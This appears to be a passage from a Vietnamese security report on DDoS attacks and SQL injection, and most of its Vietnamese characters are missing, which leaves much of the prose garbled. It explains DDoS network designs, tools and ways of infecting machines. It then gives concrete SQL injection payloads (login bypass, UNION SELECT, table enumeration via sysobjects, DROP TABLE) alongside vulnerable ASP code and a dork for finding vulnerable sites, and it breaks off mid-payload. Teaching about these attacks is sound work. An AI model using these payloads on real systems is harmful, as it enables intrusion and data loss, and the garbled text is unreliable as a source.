- Yu t thi im s quyt nh mc thit hi v tc p ng ca mc tiu i
vi cuc tn cng.
iii. Pht ng tn cng v xa du vt:

-21-

ng thi im nh, hacker pht ng tn cng t my ca mnh, lnh tn cng

ny c th i qua nhiu cp mi n host thc s tn cng. Ton b attack-network (c
th ln n hng ngn my), s vt cn nng lc ca server mc tiu lin tc, ngn chn
khng cho n hot ng nh thit k.
- Sau mt khong thi gian tn cng thch hp, hacker tin hnh xa mi du vt c th
truy ngc n mnh, vic ny i hi trnh khc cao v khng tuyt i cn thit.
2.2.2.2. Kin trc tng quan ca DDoS attack-network
Nhn chung DDoS attack-network c hai m hnh chnh:
M hnh Agent Handler
M hnh IRC Based

DDoS attack-network

Agent -Handler

Client Handler
Communication

TCP

UDP

IRC - Based

Client Handler
Communication

ICMP

TCP

UDP

Secret/private channel

Public channel

ICMP

Hnh 2.2. S chnh phn loi cc kiu tn cng DDoS

i. M hnh Agent Handler:
Theo m hnh ny, attack-network gm 3 thnh phn: Agent, Client v Handler
Client : l software c s hacker iu khin mi hot ng ca attack-network
Handler : l mt thnh phn software trung gian gia Agent v Client
Agent : l thnh phn software thc hin s tn cng mc tiu, nhn iu khin t
Client thng qua cc Handler

-22-

Attacker

Handler

Agent

Attacker

Handler

Agent

Handler

Agent

Handler

Agent

Agent

Victim
Hnh 2.3. Kin trc attack-network kiu Agent Handler
Attacker s t Client giao tip vi cc1 Handler xc nh s lng Agent ang
online, iu chnh thi im tn cng v cp nht cc Agent. Ty theo cch attacker
cu hnh attack-network, cc Agent s chu s qun l ca mt hay nhiu Handler.
Thng thng Attacker s t Handler software trn mt Router hay mt server c
lng traffic lu thng nhiu. Vic ny nhm lm cho cc giao tip gia Client,
handler v Agent kh b pht hin. Cc gia tip ny thng thng xy ra trn cc
protocol TCP, UDP hay ICMP. Ch nhn thc s ca cc Agent thng thng khng
h hay bit h b li dng vo cuc tn cng kiu DDoS, do h khng kin thc
hoc cc chng trnh Backdoor Agent ch s dng rt t ti nguyn h thng lm cho
hu nh khng th thy nh hng g n hiu nng ca h thng.
ii. M hnh IRC Based:
Internet Relay Chat (IRC) l mt h thng online chat multiuser, IRC cho php User
to mt kt ni n multipoint n nhiu user khc v chat thi gian thc. Kin trc c
IRC network bao gm nhiu IRC server trn khp internet, giao tip vi nhau trn
nhiu knh (channel). IRC network cho php user to ba loi channel: public, private
v serect.
Public channel: Cho php user ca channel thy IRC name v nhn c
message ca mi user khc trn cng channel

-23-

 Private channel: c thit k giao tip vi cc i tng cho php. Khng cho
php cc user khng cng channel thy IRC name v message trn channel. Tuy nhin,
nu user ngoi channel dng mt s lnh channel locator th c th bit c s tn ti
ca private channel .
Secrect channel : tng t private channel nhng khng th xc nh bng channel
locator.

Attacker

Attacker

IRC
NETWORK

Agent

Agent

Agent

Agent

Agent

Victim
Hnh 2.4. Kin trc attack-network ca kiu IRC-Base
IRC Based net work cng tng t nh Agent Handler network nhng m hnh ny
s dng cc knh giao tip IRC lm phng tin giao tip gia Client v Agent (khng
s dng Handler). S dng m hnh ny, attacker cn c thm mt s li th khc nh:
Cc giao tip di dng chat message lm cho vic pht hin chng l v cng kh
khn
IRC traffic c th di chuyn trn mng vi s lng ln m khng b nghi ng
Khng cn phi duy tr danh sch cc Agent, hacker ch cn logon vo IRC server l
c th nhn c report v trng thi cc Agent do cc channel gi v.
Sau cng: IRC cng l mt mi trng file sharing to iu kin pht tn cc Agent
code ln nhiu my khc.

-24-

2.2.2.3. Phn Loi Tn Cng Kiu DDOS

Nhn chung, c rt nhiu bin th ca k thut tn cng DDoS nhng nu nhn di
gc chuyn mn th c th chia cc bin th ny thnh hai loi da trn mch ch
tn cng: Lm cn kit bng thng v lm cn kit ti nguyn h thng
DDoS attack

Bandwith DeleptionDeleption

Random
Port
Attack

ICMP

Static
Port
Attack

Spoof
Source
Attack

Protocol
Exploit
Attack

Amplification
Attack

Flood Attack

UDP

Resource Deleption

Smuft
attack

Flaggle
Attack

Direct
Attack

TCP SYS

Attack

Malformed
Paclket attack

PUSH
+ACK
SYN
Attack

IP @
Attack

IP Packet
Options
Attack

Spoof
source
Attack

Spoof
source
Attack

Spoof
source
Attack

Loop
Attack
Spoof
source
Attack

Hnh 2.5. Phn loi cc kiu tn cng DDoS

i. Nhng kiu tn cng lm cn kit bng thng ca mng (BandWith Depletion
Attack)
BandWith Depletion Attack c thit k nhm lm trng ngp mng mc tiu vi
nhng traffic khng cn thit, vi mc ch lm gim ti thiu kh nng ca cc traffic
hp l n c h thng cung cp dch v ca mc tiu.
C hai loi BandWith Depletion Attack:
+ Flood attack: iu khin cc Agent gi mt lng ln traffic n h thng dch v
ca mc tiu, lm dch v ny b ht kh nng v bng thng.
+ Amplification attack: iu khin cc agent hay Client t gi message n mt a
ch IP broadcast, lm cho tt c cc my trong subnet ny gi message n h thng

-25-

dch v ca mc tiu. Phng php ny lm gia tng traffic khng cn thit, lm suy
gim bng thng ca mc tiu.
Flood attack:
Trong phng php ny, cc Agent s gi mt lng ln IP traffic lm h thng dch
v ca mc tiu b chm li, h thng b treo hay t n trng thi hot ng bo ha.
Lm cho cc User thc s ca h thng khng s dng c dch v.
Ta c th chia Flood Attack thnh hai loi:
+ UDP Flood Attack: do tnh cht connectionless ca UDP, h thng nhn UDP
message ch n gin nhn vo tt c cc packet mnh cn phi x l. Mt lng ln
cc UDP packet c gi n h thng dch v ca mc tiu s y ton b h thng
n ngng ti hn.
+ Cc UDP packet ny c th c gi n nhiu port ty hay ch duy nht mt port.
Thng thng l s gi n nhiu port lm cho h thng mc tiu phi cng ra x
l phn hng cho cc packet ny. Nu port b tn cng khng sn sng th h thng
mc tiu s gi ra mt ICMP packet loi destination port unreachable. Thng thng
cc Agent software s dng a ch IP gi che giu hnh tung, cho nn cc message
tr v do khng c port x l s dn n mt i ch Ip khc. UDP Flood attack cng
c th lm nh hng n cc kt ni xung quanh mc tiu do s hi t ca packet din
ra rt mnh.
+ ICMP Flood Attack: c thit k nhm mc ch qun l mng cng nh nh v
thit b mng. Khi cc Agent gi mt lng ln ICMP_ECHO_REPLY n h thng
mc tiu th h thng ny phi reply mt lng tng ng Packet tr li, s dn n
nghn ng truyn. Tng t trng hp trn, a ch IP ca c Agent c th b gi
mo.
+Amplification Attack:
Amplification Attack nhm n vic s dng cc chc nng h tr a ch IP broadcast
ca cc router nhm khuych i v hi chuyn cuc tn cng. Chc nng ny cho
php bn gi ch nh mt a ch IP broadcast cho ton subnet bn nhn thay v nhiu
a ch. Router s c nhim v gi n tt c a ch IP trong subnet packet
broadcast m n nhn c.
-26-

Attacker c th gi broadcast message trc tip hay thng qua mt s Agent nhm lm
gia tng cng ca cuc tn cng. Nu attacker trc tip gi message, th c th li
dng cc h thng bn trong broadcast network nh mt Agent.

Attacker/Agen
t

VICTIM

Amplifier

Amplifier Network
System

Hnh 2.6. S tn cng kiu Amplification Attack

C th chia amplification attack thnh hai loi, Smuft va Fraggle attack:
+ Smuft attack: trong kiu tn cng ny attacker gi packet n network amplifier
(router hay thit b mng khc h tr broadcast), vi a ch ca nn nhn. Thng
thng nhng packet c dng l ICMP ECHO REQUEST, cc packet ny yu cu
yu cu bn nhn phi tr li bng mt ICMP ECHO REPLY packet. Network
amplifier s gi n ICMP ECHO REQUEST packet n tt c cc h thng thuc a
ch broadcast v tt c cc h thng ny s REPLY packet v a ch IP ca mc tiu
tn cng Smuft Attack.

-27-

+ Fraggle Attack: tng t nh Smuft attack nhng thay v dng ICMP ECHO
REQUEST packet th s dng UDP ECHO packet gi m mc tiu. Tht ra cn mt
bin th khc ca Fraggle attack s gi n UDP ECHO packet n chargen port (port
19/UNIX) ca mc tiu, vi a ch bn gi l echo port (port 7/UNIX) ca mc tiu,
to nn mt vng lp v hn. Attacker pht ng cuc tn cng bng mt ECHO
REQUEST vi a ch bn nhn l mt a ch broadcast, ton b h thng thuc a
ch ny lp tc gi REPLY n port echo ca nn nhn, sau t nn nhn mt ECHO
REPLY li gi tr v a ch broadcast, qu trnh c th tip din. y chnh l nguyn
nhn Flaggle Attack nguy him hn Smuft Attack rt nhiu.
ii. Nhng kiu tn cng lm cn kit ti nguyn: (Resource Deleption Attack)
Theo nh ngha: Resource Deleption Attack l kiu tn cng trong Attacker gi
nhng packet dng cc protocol sai chc nng thit k, hay gi nhng packet vi dng
lm tt nghn ti nguyn mng lm cho cc ti nguyn ny khng phc v user thng
thng khc c.
a/ Protocol Exploit Attack:
+ TCP SYS Attack: Transfer Control Protocol h tr truyn nhn vi tin cy cao
nn s dng phng thc bt tay gia bn gi v bn nhn trc khi truyn d liu.
Bc u tin, bn gi gi mt SYN REQUEST packet (Synchronize). Bn nhn nu
nhn c SYN REQUEST s tr li bng SYN/ACK REPLY packet. Bc cui
cng, bn gi s truyn packet cui cng ACK v bt u truyn d liu.

SYS

TCP
Client
Client Port
1024-65535

SYN/AC
K
ACK

TCP
Server
80 Service

Port
1-1023

Hnh 2.7. Kiu tn cng TCP SYS Attack

Nu bn server tr li mt yu cu SYN bng mt SYN/ACK REPLY nhng khng
nhn c ACK packet cui cng sau mt khong thi gian quy nh th n s resend
-28-

li SYN/ACK REPLY cho n ht thi gian timeout. Ton b ti nguyn h thng d

tr x l phin giao tip nu nhn c ACK packet cui cng s b phong ta
cho n ht thi gian timeout.
Nm c im yu ny, attacker gi mt SYN packet n nn nhn vi a ch bn
gi l gi mo, kt qu l nn nhn gi SYN/ACK REPLY n mt a ch kh v s
khng bao gi nhn c ACK packet cui cng, cho n ht thi gian timeout nn
nhn mi nhn ra c iu ny v gii phng cc ti nguyn h thng. Tuy nhin, nu
lng SYN packet gi mo n vi s lng nhiu v dn dp, h thng ca nn nhn
c th b ht ti nguyn.

Client

Server

Attacker/Agent

Server

SYN

SYN

SYN/ACK

SYN/ACK
SYN/ACK

ACK

Hnh 2.8. Attacker gi mo Ip

+ PUSH = ACK Attack: Trong TCP protocol, cc packet c cha trong buffer, khi
buffer y th cc packet ny s c chuyn n ni cn thit. Tuy nhin, bn gi c
th yu cu h thng unload buffer trc khi buffer y bng cch gi mt packet vi
PUSH v ACK mang gi tr l 1. Nhng packet ny lm cho h thng ca nn nhn
unload tt c d liu trong TCP buffer ngay lp tc v gi mt ACK packet tr v khi
thc hin xong iu ny, nu qu trnh c din ra lin tc vi nhiu Agent, h thng
s khng th x l c lng ln packet gi n v s b treo.
b/ Malformed Packet Attack:
Malformed Packet Attack l cch tn cng dng cc Agent gi cc packet c cu
trc khng ng chun nhm lm cho h thng ca nn nhn b treo.
C hai loi Malformed Packet Attack:
+ IP address attack: dng packet c a ch gi v nhn ging nhau lm cho h iu
hnh ca nn nhn khng x l ni v b treo.
-29-

+ IP packet options attack ngu nhin ha vng OPTION trong IP packet v thit lp
tt c cc bit QoS ln 1, iu ny lm cho h thng ca nn nhn phi tn thi gian
phn tch, nu s dng s lng ln Agent c th lm h thng nn nhn ht kh nng
x l.
c/ Mt s c tnh ca cng c DdoS attack:

DDoS software Tool

Attack Network
Comminication

Agent Setup

Instalation

Active

Passive

Hide with rootkit

Yes

Encruption

No
TCP

Bugged
website

Protocol

OS
supported
Agent
Activation
Methods

Actively
Poll
UDP

Corrupted
File

Unix

Solaris Linux Windows

Live&wait

ICMP

Agent
Handlerl

YES
Private/Serect

IRC
Basedl

No
Public
Backdoor

Trojan

Buffer Overlfow

Client
Handlerl

Agent
Handlerl

None

Hnh 2.9. Mt s c tnh ca cng c DdoS attack

C rt nhiu im chung v mt software ca cc cng c DDoS attack. C th k ra
mt s im chung nh: cch ci Agent software, phng php giao tip gia cc
attacker, handler v Agent, im chung v loi h iu hnh h tr cc cng c ny. S
trn m t s so snh tng quan gia cc cng c tn cng DDoS ny.
* Cch thc ci t DDoS Agent:
Attacker c th dng phng php active v passive ci t agent software ln cc
my khc nhm thit lp attack-network kiu Agent-Handler hay IRC-based.
- Cch ci t Active:
+ Scaning: dng cc cng c nh Nmap, Nessus tm nhng s h trn cc h thng
ang online nhm ci t Agentsoftware. Ch , Nmap s tr v nhng thng tin v
-30-

mt h thng c ch nh bng a ch IP, Nessus tm kim t nhng a ch IP

bt k v mt im yu bit trc no .
+ Backdoor: sau khi tm thy c danh sch cc h thng c th li dng, attacker s
tin hnh xm nhp v ci Agentsoftware ln cc h thng ny. C rt nhiu thng tin
sn c v cch thc xm nhp trn mng, nh site ca t chc Common Vulnerabilities
and Exposures (CVE), y lit k v phn loi trn 4.000 loi li ca tt c cc h
thng hin c. Thng tin ny lun sn sng cho c gii qun tr mng ln hacker.
+ Trojan: l mt chng trnh thc hin mt chc nng thng thng no , nhng li
c mt s chc nng tim n phc v cho mc ch ring ca ngi vit m ngi
dng khng th bit c. C th dng trojan nh mt Agent software.
+ buffer Overflow: tn dng li buffer overflow, attacker c th lm cho chu trnh thc
thi chng trnh thng thng b chuyn sang chu trnh thc thi chng trnh ca
hacker (nm trong vng d liu ghi ). C th dng cch ny tn cng vo mt
chng trnh c im yu buffer overflow chy chng trnh Agent software.
- Cch ci t passive:
+ Bug Website: attacker c th li dng mt s li ca web brower ci Agent
software vo my ca user truy cp. Attaker s to mt website mang ni dung tim n
nhng code v lnh t by user. Khi user truy cp ni dung ca website, th
website download v ci t Agent software mt cch b mt. Microsoft Internet
Explorer web browser thng l mc tiu ca cch ci t ny, vi cc li ca ActiveX
c th cho php IE brower t ng download v ci t code trn my ca user duyt
web.
+ Corrupted file: mt phng php khc l nhng code vo trong cc file thng
thng. Khi user c hay thc thi cc file ny, my ca h lp tc b nhim Agent
software. Mt trong nhng k thut ph bin l t tn file rt di, do default ca cc
h iu hnh ch hin th phn u ca tn file nn attacker c th gi km theo email
cho nn nhn file nh sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, do ch thy
phn Iloveyou.txt hin th nn user s m file ny c v lp tc file ny c
thc thi v Agent code c ci vo my nn nhn. Ngoi ra cn nhiu cch khc nh
ngy trang file, ghp file
-31-

- Rootkit: l nhng chng trnh dng xa du vt v s hin din ca Agent hay

Handler trn my ca nn nhn. Rootkit thng c dng trn Hander software
c ci, ng vai tr xung yu cho s hot ng ca attack-network hay trn cc mi
trng m kh nng b pht hin ca Handler l rt cao. Rootkit rt t khi dng trn cc
Agent do mc quan trng ca Agent khng cao v nu c mt mt s Agent cng
khng nh hng nhiu n attack-network.
* Giao tip trn Attack-Network:
- Protocol: giao tip trn attack-network c th thc hin trn nn cc protocol TCP,
UDP, ICMP.
- M ha cc giao tip: mt vi cng c DDoS h tr m ha giao tip trn ton b
attack-network. Ty theo protocol c s dng giao tip s c cc phng php
m ha thch hp. Nu attack-network dng IRC-based th private v secrect channel
h tr m ha giao tip.
- Cch kch hot Agent: c hai phng php ch yu kch hot Agent. Cch th nht
l Agent s thng xuyn qut thm d Handler hay IRC channel nhn ch th
(active Agent). Cch th hai l Agent ch n gin l nm vng ch ch th t
Handler hay IRC Channel.
* Cc nn tng h tr Agent:
C cng c DDoS thng thng c thit k hot ng tng thch vi nhiu h iu
hnh khc nhau nh: Unix, Linux, Solaris hay Windows. Cc thnh phn ca attacknetwork c th vn hnh trn cc mi trng h iu hnh khc nhau.
Thng thng Handler s vn hnh trn cc h chy trn cc server ln nh Unix,
Linux hay Solaris. Agent thng thng chy trn h iu hnh ph bin nht l
windows do cn s lng ln d khai thc.
* Cc chc nng ca cng c DDoS:
Mi cng c DDoS c mt tp lnh ring, tp lnh ny c Handler v Agent thc
hin. Tuy nhin ta c th phn loi tng qut tp lnh chung ca mi cng c nh sau:
Lnh
Log On
Turn On

TP LNH CA HANDLER
M t
Nhm dng logon vo Handler software (user + password)
Kch hot Handler sn sng nhn lnh
-32-

Log Off
Turn Off

Nhm dng Logoff ra khi Handler software

Ch dn Handler ngng hot ng, nu Handler ang qut tm Agent

Initiate Attack

th dng ngay hnh vi ny

Ra lnh cho Handler hng dn mi Agent trc thuc tn cng mc

List Agents
Kiss Agents
Add victim
Download

tiu nh
Yn cu Handler lit k cc Agent trc thuc
Loi b mt Agent ra khi hng ng Attack-Network
Thm mt mc tiu tn cng
Cp nht cho Handler software (downloads file.exe v v thc thi)

Upgrades
Set Spoofing
Set Attack Time
Set Attack

Kch hot v thit lp c ch gi mo a ch IP cho cc Agent

nh thi im tn cng cho cc Agent
Thng bo di ca cuc tn cng vo mc tiu

Duration
BufferSize

Thit lp kch thc buffer ca Agent (nhm gia tng sc mnh cho

Help

Agent)
Hng dn s dng chng trnh

Turn On
Turn Off

TP LNH ca AGENT
Kich hoat Agent sn sng nhn lnh
Ch dn Agent ngng hot ng, nu Agent ang qut tm

Initiate

Handler/IRC Channel th dng ngay hnh vi ny li

Ra lnh Agent tn cng mc tiu nh

Attacke
Download

Cp nht cho Agent software (downloaf file .exe v v thc thi)

Upgrades
Set Spoofing
Set Attack

Thit lp c ch gi mo a ch IP cho cc Agent hot ng

Thng bo di cc cuc tn cng vo mc tiu

Duration
Set Packet

Thit lp kch thc ca attack packet

Size
Help

Hng dn s dng chng trnh

d. Mt s cng c DDoS:

-33-

Da trn nn tng chung ca phn trn, c nhiu cng c c vit ra, thng thng
cc cng c ny l m ngun m nn mc phc tp ngy cng cao v c nhiu bin
th mi l.
* Cng c DDoS dng Agent Handler:
- TrinOO: l mt trong cc cng c DDoS u tin c pht tn rng ri.
TrinOO c kin trc Agent Handler, l cng c DDoS kiu Bandwidth Depletion
Attack, s dng k thut UDP flood. Cc version u tin ca TrinOO khng h tr gi
mo a ch IP. TrinOO Agent c ci t li dng li remote buffer overrun. Hot
ng trn h iu hnh Solaris 2.5.1 Red Hat Linux 6.0. Attack network giao tip
dng TCP (attacker client v handler) v UDP (Handler v Agent). M ha giao tip
dng phng php m ha i xng gia Client, handler v Agent.
- Tribe Flood Network (TFN): Kiu kin trc Agent Handler, cng c DDoS ho
tr kiu Bandwidth Deleption Attack v Resourse Deleption Attack. S dng k thut
UDP flood, ICMP Flood, TCP SYN v Smurf Attack. Cc version u tin khng h
tr gi mo a ch IP, TFN Agent c ci t li dng li buffer overflow. Hot ng
trn h iu hnh Solaris 2.x v Red Hat Linux 6.0. Attack Network giao tip dng
ICMP ECHO REPLY packet (TFN2K h tr thm TCP/UDP vi tnh nng chn
protocol ty ), khng m ha giao tip (TFN2K h tr m ha)
- Stacheldraht: l bin th ca TFN c thm kh nng updat Agent t ng. Giao tip
telnet m ha i xng gia Attacker v Handler.
- Shaft: l bin th ca TrinOO, giao tip Handler Agent trn UDP, Attacker
Hendle trn Internet. Tn cng dng k thut UDP, ICMP v TCP flood. C th tn
cng phi hp nhiu kiu cng lc. C thng k chi tit cho php attacker bit tnh
trng tn tht ca nn nhn, mc quy m ca cuc tn cng iu chnh s lng
Agent.
* Cng c DDoS dng IRC Based:
Cng c DDoS dng IRC-based c pht trin sau cc cng c dng Agent Handler.
Tuy nhin, cng c DDoS dng IRC phc tp hn rt nhiu, do tch hp rt nhiu c
tnh ca cc cng c DDoS dng Agent Handler.

-34-

- Trinity: l mt in hnh ca cng c dng ny. Trinity c hu ht cc k thut tn

cng bao gm: UDP, TCP SYS, TCP ACK, TCP fragment, TCP NULL, TCP RST,
TCP random flag, TCP ESTABLISHED packet flood. N c sn kh nng ngu nhin
ha a ch bn gi. Trinity cng h tr TCP flood packet vi kh nng ngu nhn tp
CONTROL FLAG. Trinity c th ni l mt trong s cc cng c DDoS nguy him
nht.
- Ngoi ra c th nhc thm v mt s cng c DDoS khc nh Knight, c thit k
chy trn Windows, s dng k thut ci t ca troijan back Orifice. Knight dng cc
k thut tn cng nh SYV, UDP Flood v Urgent Pointer Flooder.
- Sau cng l Kaiten, l bin th ca Knight, h tr rt nhiu k thut tn cng nh:
UDP, TCP flood, SYN, PUSH + ACK attack. Kaiten cng tha hng kh nng ngu
nhin ha a ch gi mo ca Trinity.
2.2.3. Tn cng t chi dch v phn x nhiu vng DRDoS (Distributed
Reflection Denial of Service)
Xut hin vo u nm 2002, l kiu tn cng mi nht, mnh nht trong h DoS.
Nu c thc hin bi k tn cng c tay ngh th c th h gc bt c h thng pht
chc
Mc tiu chnh ca DDDoS l chim ot ton b bng thng ca my ch, tc l lm
tc ngn hon ton ng kt ni t my ch vo xng sng ca Internet v tiu hao
ti nguyn my ch. Trong sut qu trnh my ch b tn cng bng DrDoS, khng mt
my khch no ch th kt ni c vo my ch . Tt c cc dch v chy trn nn
TCP/IP nh DNS, HTTP, FTP, POP3, ... u b v hiu ha.
V c bn, DrDoS l s phi hp gia hai kiu DoS v DDoS. N c kiu tn cng
SYN vi mt my tnh n, va c s kt hp gia nhiu my tnh chim dng
bng thng nh kiu DDoS. K tn cng thc hin bng cch gi mo a ch ca
server mc tiu ri gi yu cu SYN n cc server ln nh Yahoo,Micorosoft,
cc server

-35-

Hnh 2.10. S m t kiu tn cng DRDOS

ny gi cc gi tin SYN/ACK n server mc tiu. Cc server ln, ng truyn mnh
v tnh ng vai tr zoombies cho k tn cng nh trong DdoS
Qu trnh gi c lp li lin tc vi nhiu a ch IP gip t k tn cng, vi nhiu
server ln tham gia nn server mc tiu nhanh chng b qu ti, bandwidth b chim
dng bi server ln. Tnh ngh thut l ch ch cn vi mt my tnh vi modem
56kbps, mt hacker lnh ngh c th nh bi bt c my ch no trong giy lt m
khng cn chim ot bt c my no lm phng tin thc hin tn cng.
2.3. SQL Injection
2.3.1. Tn cng SQL injection
2.3.1.1. SQL Injection l g?
Khi trin khai cc ng dng web trn Internet, nhiu ngi vn ngh rng vic m
bo an ton, bo mt nhm gim thiu ti a kh nng b tn cng t cc tin tc ch n
thun tp trung vo cc vn nh chn h iu hnh, h qun tr c s d liu,
webserver s chy ng dng, ... m qun mt ng ngay c bn thn ng dng chy trn
-36-

 cng tim n mt l hng bo mt rt ln. Mt trong s cc l hng ny l SQL

injection. Ti Vit Nam, qua thi k cc qun tr website l l vic qut virus, cp
nht cc bn v li t cc phn mm h thng, nhng vic chm sc cc li ca cc
ng dng li rt t c quan tm. l l do ti sao trong thi gian va qua, khng t
website ti Vit Nam b tn cng v a s u l li SQL injection [1]. Vy SQL
injection l g ?
SQL injection l mt k thut cho php nhng k tn cng li dng l hng trong vic
kim tra d liu nhp trong cc ng dng web v cc thng bo li ca h qun tr c
s d liu "tim vo" (inject) v thi hnh cc cu lnh SQL bt hp php (khng
c ngi pht trin ng dng lng trc). Hu qu ca n rt tai hi v n cho php
nhng k tn cng c th thc hin cc thao tc xa, hiu chnh, do c ton quyn
trn c s d liu ca ng dng, thm ch l server m ng dng ang chy. Li ny
thng xy ra trn cc ng dng web c d liu c qun l bng cc h qun tr c
s d liu nh SQL Server, MySQL, Oracle, DB2, Sysbase.
2.3.1.2. Cc Dng Tn Cng SQL Injection
C bn dng thng thng bao gm: vt qua kim tra lc ng nhp (authorization
bypass), s dng cu ln SELECT, s dng cu lnh INSERT, s dng cc storedprocedures [2], [3].
bit cc website bn hng s dng CSDL SQL ta s dng cc soft hoc cc cng
c tm li.Hoc cc cng c tm kim nh Google.V dng cc Dork tm kim nh :
inurl : product.php?id=

-37-

Hnh 2.11. Mt tools tm site li Online

bit website no dnh li SQL Injection ta thm du vo sau thanh a ch.
V d : http://www.doanchuyenganh.com/product.php?id=123

Hnh 2.12. Mt site b li SQL Injection

i. Dng tn cng vt qua kim tra ng nhp
-38-

Vi dng tn cng ny, tin tc c th d dng vt qua cc trang ng nhp nh vo li

khi dng cc cu lnh SQL thao tc trn c s d liu ca ng dng web.
Xt mt v d in hnh, thng thng cho php ngi dng truy cp vo cc trang
web c bo mt, h thng thng xy dng trang ng nhp yu cu ngi dng
nhp thng tin v tn ng nhp v mt khu. Sau khi ngi dng nhp thng tin vo,
h thng s kim tra tn ng nhp v mt khu c hp l hay khng quyt nh cho
php hay t chi thc hin tip. Trong trng hp ny, ngi ta c th dng hai trang,
mt trang HTML hin th form nhp liu v mt trang ASP dng x l thng tin
nhp t pha ngi dng. V d: login.htm
<form action="ExecLogin.asp" method="post">
Username: <input type="text" name="fUSRNAME"><br>
Password: <input type="password" name="fPASSWORD"><br>
<input type="submit">
</form>
execlogin.asp
<%
Dim vUsrName, vPassword, objRS, strSQL
vUsrName = Request.Form("fUSRNAME")
vPassword = Request.Form("fPASSWORD")
strSQL = "SELECT * FROM T_USERS " & _
"WHERE USR_NAME=' " & vUsrName & _
" ' and USR_PASSWORD=' " & vPassword & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
If (objRS.EOF) Then
Response.Write "Invalid login."
Else
Response.Write "You are logged in as " & objRS("USR_NAME")
End If
-39-

Set objRS = Nothing

%>
Thot nhn, on m trong trang execlogin.asp dng nh khng cha bt c mt l
hng v an ton no. Ngi dng khng th ng nhp m khng c tn ng nhp v
mt khu hp l. Tuy nhin, on m ny thc s khng an ton v l tin cho mt
li SQL injection. c bit, ch s h nm ch d liu nhp vo t ngi dng c
dng xy dng trc tip cu lnh SQL. Chnh iu ny cho php nhng k tn cng
c th iu khin cu truy vn s c thc hin. V d, nu ngi dng nhp chui
sau vo trong c 2 nhp liu username/password ca trang login.htm l: ' OR ' ' = ' '.
Lc ny, cu truy vn s c gi thc hin l:
SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and
USR_PASSWORD= '' OR ''=''
Cu truy vn ny l hp l v s tr v tt c cc bn ghi ca T_USERS v on m
tip theo x l ngi dng ng nhp bt hp php ny nh l ngi dng ng nhp
hp l.
ii. Dng tn cng s dng cu lnh SELECT
Dng tn cng ny phc tp hn. thc hin c kiu tn cng ny, k tn cng
phi c kh nng hiu v li dng cc s h trong cc thng bo li t h thng d
tm cc im yu khi u cho vic tn cng. Xt mt v d rt thng gp trong cc
website v tin tc. Thng thng, s c mt trang nhn ID
ca tin cn hin th ri sau truy vn ni dung ca tin c ID ny. V d:
http://www.doanchuyennganh.com/product.asp?ID=123 . M ngun cho chc nng
ny thng c vit kh n gin theo dng
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
-40-

%>
Trong cc tnh hung thng thng, on m ny hin th ni dung ca tin c ID trng
vi ID ch nh v hu nh khng thy c li. Tuy nhin, ging nh v d ng nhp
trc, on m ny l s h cho mt li SQL injection khc. K tn cng c th
thay th mt ID hp l bng cch gn ID cho mt gi tr khc, v t , khi u cho
mt cuc tn cng bt hp php, v d nh: 0
OR 1=1 (ngha l, http://www.doanchuyennganh.com/product.asp?ID=0 or 1=1).
Cu truy vn SQL lc ny s tr v tt c cc article t bng d liu v n s thc hin
cu lnh:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Mt trng hp khc, v d nh trang tm kim. Trang ny cho php ngi dng nhp
vo cc thng tin tm kim nh H, Tn, on m thng gp l:
<%
Dim vAuthorName, objRS, strSQL
vAuthorName = Request("fAUTHOR_NAME")
strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME =' " & _
vAuthorName & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."

Set objRS = Nothing

%>
Tng t nh trn, tin tc c th li dng s h trong cu truy vn SQL nhp vo
trng tn tc gi bng chui gi tr:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '='
(*)
Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh s thc hin thm
lnh tip theo sau t kha UNION na.

-41-

Tt nhin cc v d ni trn, dng nh khng c g nguy him, nhng hy th tng

tng k tn cng c th xa ton b c s d liu bng cch chn vo cc on lnh
nguy him nh lnh DROP TABLE. V d nh: ' DROP TABLE T_AUTHORS -Chc cc bn s thc mc l lm sao bit c ng dng web b li dng ny c. Rt
n gin, hy nhp vo chui (*) nh trn, nu h thng bo li v c php dng:
Invalid object name OtherTable; ta c th bit chc l h thng thc hin cu
SELECT sau t kha UNION, v nh vy mi c th tr v li m ta c tnh to ra
trong cu lnh SELECT.
Cng s c thc mc l lm th no c th bit c tn ca cc bng d liu m thc
hin cc thao tc ph hoi khi ng dng web b li SQL injection. Cng rt n gin,
bi v trong SQL Server, c hai i tng l sysobjects v syscolumns cho php lit k
tt c cc tn bng v ct c trong h thng. Ta ch cn chnh li cu lnh SELECT, v
d nh:
' UNION SELECT name FROM sysobjects WHERE xtype = 'U' l c th lit k c
tn tt c cc bng d liu.
iii. Dng tn cng s dng cu lnh INSERT
Thng thng cc ng dng web cho php ngi dng ng k mt ti khon
tham gia. Chc nng khng th thiu l sau khi ng k thnh cng, ngi dng c th
xem v hiu chnh thng tin ca mnh. SQL injection c th c dng khi h thng
khng kim tra tnh hp l ca thng tin nhp vo.
V d, mt cu lnh INSERT c th c c php dng: INSERT INTO TableName
VALUES('Value One',
'Value Two', 'Value Three'). Nu on m xy dng cu lnh SQL c dng :
<%
strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' " _
& strValueTwo & " ', ' " & strValueThree & " ') "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."

Set objRS = Nothing

-42-

%>
Th chc chn s b li SQL injection, bi v nu ta nhp vo trng th nht v d
nh: ' + (SELECT TOP 1 FieldName FROM TableName) + '. Lc ny cu truy vn s
l: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM
TableName) + ' ', 'abc', 'def'). Khi , lc thc hin lnh xem thng tin, xem nh bn
yu cu thc hin thm mt lnh na l: SELECT TOP 1
FieldName FROM TableName
iiii. Dng tn cng s dng stored-procedures
Vic tn cng bng stored-procedures s gy tc hi rt ln nu ng dng c thc thi
vi quyn qun tr h thng 'sa'. V d, nu ta thay on m tim vo dng: ' ; EXEC
